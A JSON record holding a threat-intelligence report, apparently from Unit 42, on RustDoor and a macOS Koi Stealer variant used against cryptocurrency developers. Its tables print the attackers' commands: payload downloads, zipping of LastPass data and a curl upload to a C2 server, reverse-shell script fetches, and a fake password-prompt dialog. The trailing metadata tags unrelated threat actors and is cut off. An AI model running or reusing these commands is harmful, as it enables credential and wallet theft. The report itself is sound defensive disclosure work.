{ "id": "be746589-8dd0-49f0-9c3e-050620f30d43", "created_at": "2026-04-06T00:10:48.604288Z", "updated_at": "2026-04-10T03:37:08.585485Z", "deleted_at": null, "sha1_hash": "781a1574a9f8bf669ba2f775f05296595e0033a3", "title": "RustDoor and Koi Stealer for macOS Used by North Korea-Linked Threat Actor to Target the Cryptocurrency Sector", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 737474, "plain_text": "RustDoor and Koi Stealer for macOS Used by North Korea-Linked\r\nThreat Actor to Target the Cryptocurrency Sector\r\nBy Adva Gabay, Daniel Frank\r\nPublished: 2025-02-26 · Archived: 2026-04-05 15:25:42 UTC\r\nExecutive Summary\r\nMalware targeting macOS systems is increasingly pervasive in our current threat landscape. Most of the\r\nassociated threats are cybercrime-related, ranging from information stealers to cryptocurrency mining. Over the\r\npast year, we have witnessed an increase in cybercrime activity linked to North Korean nation-state APT groups.\r\nIn line with the public service announcement issued by the FBI regarding North Korean social engineering\r\nattacks, we have also witnessed several such social engineering attempts, targeting job-seeking software\r\ndevelopers in the cryptocurrency sector.\r\nIn this campaign, we discovered a Rust-based macOS malware nicknamed RustDoor masquerading as a legitimate\r\nsoftware update, as well as a previously undocumented macOS variant of a malware family known as Koi Stealer.\r\nDuring our investigation, we observed rare evasion techniques, namely, manipulating components of macOS to\r\nremain under the radar.\r\nThe characteristics of these attackers are similar to various reports during the past year of North Korean threat\r\nactors targeting other job seekers. We assess with a moderate level of confidence that this attack was carried out\r\non behalf of the North Korean regime.\r\nThis article details the activity of attackers within compromised environments. It also provides a technical analysis\r\nof the newly discovered Koi Stealer macOS variant and depicts the different stages of the attack through the lens\r\nof Cortex XDR.\r\nPalo Alto Networks customers are better protected against the RustDoor and Koi Stealer malware presented in this\r\nresearch through the following products and services:\r\nCortex XDR and XSIAM\r\nCloud-Delivered Security Services for the Next-Generation Firewall, such as Advanced WildFire,\r\nAdvanced DNS Security and Advanced URL Filtering.\r\nIf you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response\r\nteam.\r\nThe Campaign’s Infection Vector\r\nThis campaign’s infection vector bears similarities to previous research.\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 1 of 15\n\nWe have tracked activity from suspected North Korean threat actors in a campaign we track as CL-STA-240 and\r\ncall Contagious Interview. In this campaign, attackers pose as recruiters or prospective employers and ask\r\npotential victims to install malware masquerading as legitimate development software as part of the vetting\r\nprocess. These attacks generally target job seekers in the tech industry and likely occur through email, messaging\r\nplatforms or other online interview methods. While our research into this current activity reveals similarities with\r\nContagious Interview, we did observe distinct tactics, techniques and procedures (TTPs) that cause us to consider\r\nthis a separate campaign.\r\nRecent research from Jamf Threat Labs describes a similar attack method, this time using a malicious Visual\r\nStudio project challenge named “SlackToCSV” to target job-seeking software developers.\r\nIn our research, we found forensic evidence of a similar malicious Visual Studio project in addition to other\r\nmalicious projects. Moreover, one of the samples of the RustBucket malware named .zsh_env had the same hash\r\nas the ThiefBucket sample noted by Jamf Threat Labs. However, we found different command and control (C2)\r\nservers for other samples we encountered during our research.\r\nExecution and Download of Malware\r\nWhen examining attacker activity on the infected endpoints, we noticed their persistent nature, as attackers\r\nattempted to execute several different malware variants. When these attempts were prevented by Cortex XDR, the\r\nattackers tried redeploying and executing additional malware to evade detection. Analyzing one of these attacks,\r\nwe can divide it into three distinct stages:\r\nAttempting to execute two RustDoor variants\r\nTrying an additional RustDoor variant and attempting a reverse shell\r\nRunning a previously undocumented macOS Koi Stealer variant\r\nWe describe these phases in the following sections, starting with the initial attempt to execute two RustDoor\r\nvariants.\r\nAttempting to Execute Two RustDoor Binaries\r\nInitially, when executing the fake job interview project within Visual Studio, the malicious code attempts to\r\ndownload and execute two separate Mach-O binaries of RustDoor. Figure 1 shows the names and locations of\r\nthese Mach-O files from a Cortex XDR alert blocking the activity.\r\nThe paths of the RustDoor files are:\r\n/Users/$USER$/.zsh_env\r\n/Users/$USER$/Library/VisualStudioHelper\r\nFigure 1. RustDoor malware locations from the Cortex XDR alert blocking the activity.\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 2 of 15\n\nAn Additional RustDoor Binary and Attempting to Open a Reverse Shell\r\nAfter the first two RustDoor binaries’ executions were prevented, the attackers executed another sample of\r\nRustDoor. The malware then attempted to steal sensitive data such as passwords from the LastPass Google\r\nChrome extension, exfiltrate data to its C2 server and download two additional bash scripts. These bash scripts are\r\nintended to open a reverse shell connection with the attackers.\r\nFigure 2 shows the different commands executed by this RustDoor binary.\r\nFigure 2. The execution and commands of the second RustDoor binary.\r\nTable 1 shows the different command lines from Figure 2 and their respective descriptions.\r\nCommand Line Description\r\ncurl -O -s hxxps://apple-ads-metric[.]com/npm Download RustDoor\r\nchflags hidden npm\r\nSet RustDoor to be\r\nhidden on disk\r\nchmod +x npm\r\nGrant RustDoor\r\nexecution permissions\r\nlog stream --predicate eventMessage contains \"com.apple.restartInitiated\" or\r\neventMessage contains \"com.apple.shutdownInitiated\" --info \r\nRetrieve information\r\nabout shutdown and\r\nrestart events\r\nzsh -c zip -r [redacted].zip /Users/$USER$/Library/Application\\\r\nSupport/Google/Chrome/Default/Local\\ Extension\\\r\nSettings/aeblfdkhhhdcdjpifhhbdiojplfjncoa    \r\nSteal LastPass data from\r\nGoogle Chrome's\r\nextension for LastPass\r\nzsh -c curl -F file=[redacted].zip\r\nhxxps://visualstudiomacupdate[.]com/tasks/upload_file\r\nData exfiltration attempt\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 3 of 15\n\nzsh -c curl -O -s hxxps://apple-ads-metric[.]com/back.sh \r\nReverse shell script No.\r\n1\r\nzsh -c curl -O -s hxxps://apple-ads-metric[.]com/sh.sh \u0026\u0026 chmod +x sh.sh \r\nReverse shell script No.\r\n2 and grant execution\r\npermissions\r\nzsh -c mdfind -name .pem\r\nSearching for public\r\nkeys\r\nTable 1. The command lines executed by RustDoor and their description.\r\nFigure 3 shows a Cortex XDR alert blocking attempts at reverse shell execution by both shell scripts to a C2\r\nserver at 31.41.244[.]92 over TCP port 443.\r\nFigure 3. The two reverse shell execution attempts to 31.41.244[.]92 prevented by Cortex XDR.\r\nThe IP address (31.41.244[.]92) the reverse shell connection attempt was initiated from has a history of malicious\r\nuse since at least 2022, and it was previously associated with RedLine Stealer.\r\nExecuting a Previously Undocumented macOS Koi Stealer Variant\r\nThe attackers downloaded and executed a final payload that we have identified as a previously undocumented\r\nvariant of Koi Stealer malware. This Koi Stealer sample masqueraded as a VisualStudio update, which prompted\r\nthe user to install it and grant it Administrator access.\r\nFigure 4 shows the execution process as detected in Cortex XDR.\r\nFigure 4. macOS Koi Stealer variant download as detected by Cortex XDR.\r\nThe different command lines from Figure 2 and their respective descriptions are detailed below in Table 2,\r\nexcluding commands similar to those described in Table 1.\r\nCommand Line Description\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 4 of 15\n\nsh -c tccutil reset AppleEvents\r\nReset permissions for Apple\r\nEvents\r\nsh -c ps aux List running processes\r\nsh -c system_profiler SPHardwareDataType\r\nRetrieve detailed information\r\nabout the device’s hardware\r\nsh -c osascript\u003c\u003cEOD\r\ndisplay dialog \"Visual Studio requires permission to install update.\r\nPlease enter password for [redacted]:\" default answer \"\" with title \"Visual\r\nStudio\" with icon POSIX file \"/Users/$USER$/vs.png\" with hidden answer\r\nEOD\r\nDisplay a window with a\r\npassword prompt\r\nsh -c sw_vers\r\nRetrieve the macOS software\r\nversion\r\nTable 2. The command lines executed by Koi Stealer and their description.\r\nTechnical Analysis of the macOS Koi Stealer Variant\r\nThe Koi Stealer malware is an infostealer that retrieves sensitive data from compromised devices in two phases\r\nand sends it back to the C2 server. Similar to the features of the latest Windows variant, the macOS variant is\r\nheavily focused on stealing different cryptocurrency wallets. The full list can be found in Appendix C.\r\nThe section below details key features of the Koi Stealer macOS malware and compares the sample's macOS\r\nfunctionality with its Windows counterpart.\r\nMain Capabilities\r\nData Collection and Exfiltration\r\nStage 1\r\nInitially, Koi Stealer collects reconnaissance information from the infected machine, such as the hardware\r\nUniversally Unique Identifier (UUID) and information about the current user.\r\nSince this Koi Stealer impersonates Visual Studio, potential victims may be less suspicious when the app requests\r\na root password as shown below in Figure 5. The RustDoor variant operates in a similar way.\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 5 of 15\n\nFigure 5. macOS Koi Stealer variant pop-up asking for the root password.\r\nThis pop-up asking for the root password remains until the user enters the correct password. After retrieving the\r\nuser’s password and UUID, the malware decodes the C2 URL and forwards these three pieces of information to its\r\nmain function.\r\nFigure 6 displays decompiled code from the malware. The instructions show these three functions and the URL\r\nfor sending the stolen data to the malware's C2 server.\r\nFigure 6. Decompiled code from the macOS Koi Stealer variant showing initial activity.\r\nThe main function begins by generating two random keys, which the malware uses later to encrypt the data that it\r\nwill send to the C2 server. The malware then proceeds to build an initial HTTP request that exfiltrates the\r\nfollowing information:\r\nThe current user’s username and password\r\nHostname\r\nBuild information\r\nHardware details\r\nProcess list\r\nInstalled applications\r\nStage 2\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 6 of 15\n\nAfter the first stage is complete, the malware moves to its second stage of data gathering and exfiltration. During\r\nthis phase, it copies multiple files of interest from the infected machine, including:\r\nBrowser files (under $HOME/Library/Application Support)\r\nFilezilla files (recentservers.xml and sitemanager.xml files)\r\nOpenVPN profile files\r\nSteam user and configuration files\r\nCryptocurrency wallets (under $HOME/Library/Application Support)\r\nDiscord users and configuration files\r\nTelegram data files\r\nzsh history\r\nSSH configuration files (under $HOME/.ssh)\r\nKeychain files (under $HOME/Library/Keychains)\r\nNotes (under $HOME/Library/Containers/com.apple.Notes/Data/Library/Notes)\r\nSafari files (under /Library/Containers/com.apple.Safari/Data/Library/Cookies)\r\nUse of AppleScript by the Malware\r\nMuting the System to Operate in Maximum Stealth\r\nThis malware uses AppleScript to mute the system’s volume. It might do this to conceal subsequent commands\r\nthat copy multiple files, which could create a noticeable notification sound.\r\nAfter executing the exfiltration commands, the malware restores the audio using the same technique. The malware\r\nuses the following AppleScript commands for muting and unmuting the system volume:\r\nset volume output muted true\r\nset volume output muted false\r\nCollecting Specific Files of Interest\r\nLater in its execution flow, the malware uses AppleScript again for a different purpose, to collect specific files and\r\ncopy them from multiple locations to a temporary directory. These files are part of stage 2 for stolen information\r\nsent to the C2 server.\r\nThis time, the malware focuses on all the files located in the user’s ~/Desktop and ~/Documents directories,\r\nfiltered by selected extensions. The attacker likely uses AppleScript in this manner in an attempt to remain\r\nundetected.\r\nFigure 7 shows the corresponding code, and the full list of extensions can also be found in Appendix C.\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 7 of 15\n\nFigure 7. macOS Koi Stealer’s code responsible for stealing files with specific extensions.\r\nStrings Encryption\r\nKoi Stealer’s strings are decrypted at runtime using the same function called numerous times throughout the\r\nbinary. In this sample, the decryption function iterates through each character in a hard-coded key\r\n(xRdEh3f6g1qxTxsCfg1d30W66JuUgQvVti), from index 0 to 33, XORing each character of the key with the\r\ncorresponding character in the encrypted string.\r\nDuring our research, we developed a program that implements the same logic, allowing us to decrypt the strings\r\nand better understand the malware’s functionality. Figure 8 shows decryption function code from the malware.\r\nAppendix C lists notable decrypted strings.\r\nFigure 8. macOS Koi Stealer variant strings decryption routine.\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 8 of 15\n\nSimilarities With the Windows Koi Stealer Variant\r\nDuring our research, we found multiple similarities with a previous sample we have determined to be a Windows\r\nvariant of Koi Stealer (SHA256: 2b8c057cf071bcd548d23bc7d73b4a90745e3ff22e5cddcc71fa34ecbf76a8b5). In\r\nthis section we will detail the most notable ones, demonstrating the strong resemblance between the two.\r\nHTTP Packet Structure and Sending Memory Streams\r\nIn both cases, malware developers used similar string formats for transmitting and receiving requests from the C2\r\nserver. However, the hard-coded strings differ between the two variants.\r\nIn both variants, the strings are formatted as follows: BASECFG|\u003chardware UUID\u003e|I1StYPe4|{encrypted host\r\ninformation}.\r\nFigures 9 and 10 show the string formats in code from both the macOS and Windows variants.\r\nFigure 9. macOS Koi Stealer variant HTTP request string format.\r\nFigure 10. Windows Koi Stealer variant HTTP request string format.\r\nMoreover, both variants send memory streams of data directly to the C2 server, to avoid saving certain\r\ninformation on disk thus risking detection.\r\nCode Flow and Data Theft\r\nWhen analyzing the code structure and general execution flow in both variants, we noticed multiple similarities.\r\nFor example, they shared an interest in similar sensitive data and the general code flow that consists of\r\nencapsulating each stolen data type in a separate function.\r\nIn addition to typical data that infostealers usually steal, both samples also focus on unique paths, such as the\r\nconfigurations for Steam and Discord. Figures 11 and 12 show the code responsible for stealing data in the two\r\nvariants.\r\nFigure 11. macOS Koi Stealer variant data theft functions.\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 9 of 15\n\nFigure 12. Windows Koi Stealer variant data theft functions.\r\nPotential Connection to North Korean Affiliated Activity\r\nAt the time of writing this article, it remains unclear which of the North Korean APT groups or sub-groups are\r\nbehind this operation. However, we can link this activity to known North Korean operations, based on the\r\nfollowing:\r\nTool set: The attackers used the RustDoor backdoor that Sentinel One previously attributed to the North\r\nKorean threat actor we track as Alluring Pisces (aka BlueNoroff, Sapphire Sleet). It is unclear however,\r\nwhether this tool is unique to the group, or whether other North Korean APT groups also use it.\r\nInfrastructure: The domain apple-ads-metric[.]com hosts both RustDoor and the macOS variant of Koi\r\nStealer, as noted previously in Table 1 and Figure 4.\r\nVictimology:\r\nWe observed that the victims were all software developers within the cryptocurrency industry.\r\nThe targets in this campaign are both aligned with the public service notice published by the FBI we\r\nmentioned earlier in this article.\r\nConsidering all of the above, we assess with a moderate level of confidence that this attack was carried out on\r\nbehalf of the North Korean regime.\r\nConclusion\r\nIn this article, we reviewed a campaign we believe is linked to North Korean threat actors. The campaign includes\r\na previously undocumented macOS variant of malware known as Koi Stealer. We analyzed how attackers\r\ndelivered and used it to try to gather sensitive data and cryptocurrency wallets from compromised endpoints. We\r\nreviewed the modus operandi of this campaign and discussed the possible ties this campaign has with North\r\nKorean threat actors.\r\nWe also detailed the persistent nature of the attackers that deployed different tools, as their previous attempts were\r\ndetected and prevented by Cortex XDR.\r\nFinally, this campaign highlights the risks organizations worldwide face from elaborate social engineering attacks\r\ndesigned to infiltrate networks and steal sensitive data and cryptocurrencies. These risks are magnified when the\r\nperpetrator is a nation-state threat actor, compared to a purely financially motivated cybercriminal.\r\nWe encourage organizations to implement a proactive and multilayered approach when facing such threats and\r\ninvest in social engineering awareness training.\r\nProtections and Mitigations\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 10 of 15\n\nFor Palo Alto Networks customers, our products and services provide the following coverage associated with this\r\ngroup:\r\nAdvanced WildFire cloud-delivered malware analysis service accurately identifies the known samples as\r\nmalicious.\r\nAdvanced URL Filtering and Advanced DNS Security identify domains associated with this group as\r\nmalicious.\r\nCortex XDR and XSIAM are designed to:\r\nPrevent the execution of known and unknown malware using Behavioral Threat Protection and\r\nmachine learning based on the Local Analysis module\r\nThe new macOS Analytics module helps to protect against attacks using macOS malware,\r\nincluding those mentioned in this article\r\nDetect user and credential-based threats by analyzing anomalous user activity from multiple data\r\nsources\r\nThe new Cortex XDR macOS Analytics module provides enhanced behavioral detection capabilities\r\nagainst complex threats targeting macOS users\r\nIf you think you might have been impacted or have an urgent matter, get in touch with the Unit 42 Incident\r\nResponse team or call:\r\nNorth America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)\r\nUK: +44.20.3743.3660\r\nEurope and Middle East: +31.20.299.3130\r\nAsia: +65.6983.8730\r\nJapan: +81.50.1790.0200\r\nAustralia: +61.2.4062.7950\r\nIndia: 00080005045107\r\nPalo Alto Networks has shared these findings, including file samples and indicators of compromise, with our\r\nfellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to\r\ntheir customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat\r\nAlliance.\r\nAppendix A\r\nDetection With the Cortex XDR macOS Analytics Module\r\nThe new Cortex XDR macOS Analytics module provides enhanced behavioral detection capabilities against\r\ncomplex threats targeting macOS users. In the incidents described above, several rules were triggered by\r\nmalicious activity originating from infected endpoints. Figure A1 below depicts alerts that were triggered due to\r\nsuspicious unauthorized browser credentials access and an attempt to open a reverse shell.\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 11 of 15\n\nFigure A1. Unusual access to browser credentials alert as seen in Cortex XDR.\r\nAppendix B\r\nIndicators of Compromise\r\nRustDoor Variants\r\n.zsh_env\r\nFAT: a900ec81363358ef26bcdf7827f6091af44c3f1001bc8f52b766c9569b56faa5\r\nx64: baa676b671e771bf04b245e648f49516b338e1f49cbd9b4d237cc36d57ab858d\r\narm: 76f96a35b6f638eed779dc127f29a5b537ffc3bb7accc2c9bfab5a2120ea6bc9\r\nMalicious Files Impersonating Visual Studio Helper\r\nFAT: adde2970b40634e91b9ef8520f8e50eaa7901a65f9230e65d7995ac1a47700ef\r\nx64: c379f4ab29a49d4bccb232c8551d1b8b01e64440ea495bbabef9010a519516c3\r\narm: a5b7ddd12539ce3e8c08bed5855ddcea3217d41d7d4c58fcc1a7e01336b38912\r\nNPM No. 1\r\nFAT: b5412375477a180608bf410f5cb36b4a0949bee7663648a06879f42be9a3b6bc\r\nx64: b5119a49830a2044f406645c261e54ab335c9b1e1ed320df758405a8147fae88\r\nARM: 17064520feaf5804aa725e123b24fd0f73f8afc9b7f4361650cd11ddf4ee768f\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 12 of 15\n\nNPM No. 2\r\nFAT: 8be62324fe5af009c12fb9afc8d4f47d12c98ea680bff490b3f5e0c72c8f9617\r\nx64: 77361f7ef25a0185636a0fc6deff2e9986720223da9d6b1494f671082105bebb\r\nARM: 27fcc3278afbbec44737e9f72666946607fea819f5b1cb9fbbe268037a561f0b\r\nKoi Stealer macOS Variant\r\nFAT: 97abafff549ea21797c135c965c5e4a46a44ec7353b2edd293e8a22d5954b6aa\r\nx64: c42b103b42d7e9817f93cb66716b7bf2e4fe73a405e0fbbae0806ce8b248a304\r\nARM: 8f0e2b8b3e07f5761066cb00bc0db10d68c56ada8c054e9f07990cc1ac5ae962\r\nMalware downloads domain\r\nhxxps://apple-ads-metric[.]com\r\nRustDoor C2 domain\r\nhxxps://visualstudiomacupdate[.]com\r\nmacOS Koi Stealer C2 IP address\r\n5.255.101[.]148\r\nReverse shell IP address\r\n31.41.244[.]92\r\nStrings encryption key\r\nxRdEh3f6g1qxTxsCfg1d30W66JuUgQvVti\r\nAppendix C: Notable Decrypted Strings\r\nKoi Stealer macOS Variant Targeted Cryptocurrency Wallets List\r\nAtomic\r\nBitPay\r\nBitcoin\r\nBlockstream\r\nCoinomi\r\nDaedalus\r\nDashCore\r\nDigiByte\r\nDogecoin\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 13 of 15\n\nElectronCash\r\nElectrum\r\nEthereum\r\nExodus\r\nGuarda\r\nJaxx\r\nLedger\r\nMonero\r\nMyMonero\r\nRavecoin\r\nKoi Stealer macOS Variant File Extensions of Interest\r\nAsc\r\nConf\r\nDat\r\nDoc\r\nDocx\r\nJpg\r\nJson\r\nKdbx\r\nKey\r\nOvpn\r\nPdf\r\nPem\r\nPpk\r\nRdp\r\nRtf\r\nSql\r\nTxt\r\nWallet\r\nXls\r\nXlsx\r\nKoi Stealer macOS Variant Targeted Browsers List\r\nBrave\r\nChrome\r\nChromium\r\nCocCoc\r\nEdge\r\nFirefox\r\nOpera\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 14 of 15\n\nOpera GX\r\nThunderbird (eMail application)\r\nVivaldi\r\nWaterfox\r\nKoi Stealer macOS Variant Targeted Directories\r\n~/Desktop\r\n~/Documents\r\n~/Library/Containers/com.apple.Notes/Data/Library/Notes\r\n~/Library/Keychains\r\n~/.config/filezilla\r\n~/Library/Application Support/OpenVPN Connect/profiles\r\n~/Library/Application Support/Steam/config\r\n~/Library/Application Support/discord/Local Storage\r\n~/Library/Application Support/Telegram Desktop/tdata\r\nAdditional Resources\r\nNew macOS Backdoor Written in Rust Shows Possible Link with Windows Ransomware Group –\r\nBitdefender\r\nRustDoor and GateDoor: A New Pair of Weapons Disguised as Legitimate Software by Suspected\r\nCybercriminal – S2W Blog on Medium\r\nJamf Threat Labs observes targeted attacks amid FBI Warnings – Jamf Threat Labs\r\nUpdates from the MaaS: new threats delivered through NullMixer – L M on Medium\r\nKoi Loader malware hidden in signed installation files – An Xin Threat Intelligence Center, Security\r\nInsider\r\nContagious Interview research by Unit 42 – Unit 42, Palo Alto Networks\r\nSource: https://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nhttps://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://unit42.paloaltonetworks.com/macos-malware-targets-crypto-sector/" ], "report_names": [ "macos-malware-targets-crypto-sector" ], "threat_actors": [ { "id": "810fada6-3a62-477e-ac11-2702f9a1ef80", "created_at": "2023-01-06T13:46:38.874104Z", "updated_at": "2026-04-10T02:00:03.129286Z", "deleted_at": null, "main_name": "STARDUST CHOLLIMA", "aliases": [ "Sapphire Sleet" ], "source_name": "MISPGALAXY:STARDUST CHOLLIMA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0", "created_at": "2022-10-25T15:50:23.240383Z", "updated_at": "2026-04-10T02:00:05.299433Z", "deleted_at": null, "main_name": "APT38", "aliases": [ "APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM" ], "source_name": "MITRE:APT38", "tools": [ "ECCENTRICBANDWAGON", "HOPLIGHT", "Mimikatz", "KillDisk", "DarkComet" ], "source_id": "MITRE", "reports": null }, { "id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd", "created_at": "2022-10-25T16:07:23.766784Z", "updated_at": "2026-04-10T02:00:04.7432Z", "deleted_at": null, "main_name": "Bluenoroff", "aliases": [ "APT 38", "ATK 117", "Alluring Pisces", "Black Alicanto", "Bluenoroff", "CTG-6459", "Copernicium", "G0082", "Nickel Gladstone", "Sapphire Sleet", "Selective Pisces", "Stardust Chollima", "T-APT-15", "TA444", "TAG-71", "TEMP.Hermit" ], "source_name": "ETDA:Bluenoroff", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", 